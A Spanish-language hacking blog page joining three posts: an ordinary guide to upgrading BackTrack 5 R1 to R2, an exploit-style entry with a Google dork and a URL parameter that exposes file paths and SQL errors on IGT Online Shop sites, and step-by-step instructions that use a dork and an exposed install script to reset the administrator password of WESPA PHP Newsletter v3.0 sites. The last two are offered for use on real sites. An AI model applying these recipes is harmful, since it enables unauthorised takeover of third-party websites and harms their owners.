Actualizar a BackTrack 5 R2!

Hace poco en el blog oficial de Bactrack se posteó una entrada en donde nos enseñan los comandos y pasos necesarios para actualizar nuestro BackTrack 5 R1 a R2. Esencialmente actualizan el kernel al 3.2.6, agregan herramientas nuevas y algunos parches de seguridad. Aquí como hacer la actualización:

1.- Instalación para actualizar y mejorar BT5 (R1):

apt-get update
apt-get dist-upgrade
reboot

Se instaló el nuevo kernel y las actualizaciones de la versión R2 oficial. Es necesario reiniciar el sistema para que parta el kernel 3.2.6.

2.- OPCIONAL - Una vez reiniciado, pueden cambiar la consola de la pantalla de bienvenida.

fix-splash
reboot

Con el reinicio, deberían ver la consola de la pantalla de bienvenida aparece de color rojo.

3.- Comprobar que se está ejecutando el kernel 3.2.6:

uname -a

Deberían ver algo como "Linux bt 3.2.6 ..."

4.- Ahora pueden instalar cualquiera de las nuevas herramientas que trae BackTrack 5 R2:

apt-get install pipal findmyhash metasploit joomscan hashcat-gui golismero easy-creds pyrit sqlsus vega libhijack tlssled hash-identifier wol-e dirb reaver wce sslyze magictree nipper-ng rec-studio hotpatch xspy arduino rebind horst watobo patator thc-ssl-dos redfang findmyhash killerbee goofile bt-audit bluelog extundelete se-toolkit casefile sucrack dpscan dnschef

5.- Agragamos un nuevo repositorio de seguridad a /etc/apt/sources.list, y volvemos a actualizar:

echo "deb http://updates.repository.backtrack-linux.org revolution main microverse non-free testing" >> /etc/apt/sources.list
apt-get update
apt-get dist-upgrade

Aquí en todas las preguntas que les hagan pulsen "Enter" y aceptar todos los valores predeterminados.

6.- Por último, para que no hayan problemas desactivamos algunos servicios :

/etc/init.d/apache2 stop
/etc/init.d/cups stop
/etc/init.d/winbind stop

update-rc.d -f cups remove
update-rc.d -f apache2 remove
update-rc.d -f winbind remove

Y ya está todo listo, ahora tenemos nuestro BackTrack 5 R2 actualizado a la fecha!. En el blog oficial de Bactrack se promete el BT5 R2 en ISO para el 1 de mayo a través de Torrent.

Yo me demoré en total unos 35 min en actualizar. Espero les haya gustado y les sea útil.

Exploit Full path disclosure and Sql Error ONLINE SHOP IGT

# Exploit Title: Full path disclosure and Sql Error ONLINE SHOP IGT
# Date: 24/02/2012
# software: IGT Online Shop
# link: http://www.igt.com.hk
# Version: ALL
# Category: webapps
# Google dork: inurl:company_index.php
# Tested on: Linux



----------------
Vulnerability
----------------

Exploit:
======================

http://localhost/path/company_index.php?id=[ID#NUMBER]&file=home&prod=&uid=[FPD & ERROR SQL]

======================
Example:
======================

http://Mazt0rsite.com/company_index.php?id=245&file=home&prod=prod&uid=

Result FPD: Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/Mazt0rsite/path/path2/public_html/company_index.php on line 3

Regular Result2: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1 [PWNED XD]

"WESPA PHP Newsletter v3.0" Remote Admin Password Change With install Path"

ok empesemos es muy sencillo
1- Dork: intitle:"News list Administration panel"
intitle:"WESPA PHP Newsletter v3.0"

 2- Dirigirse a la url webconwespa.com/newsletter/admin.php

 
3- Borrar de la url "admin.php" y dirigirse a el PATH /newsletter/install/install1.php y nos imprimira la configuracion

4- En el campo de PASSWD podemos modificarlo por una contraseña nueva.

Config establecida

Config editada

5- una vez hecho estos cambios procedemos a guardar la config "NEXT STAGE" y "FINISH INSTALL".

6- Una vez hecho esto podemos dirigirnos a la pagina de Adm PATH:/newsletter/admin.php o simplemente click en: "Goto the admin page" como se muestra en la imagen, ingresamos los nuevos datos o los que visualizamos anteriormente en la config y ya estariamos dentro!.

 y listo de aqui usteds lo que puedan avisar alos dueño de este bug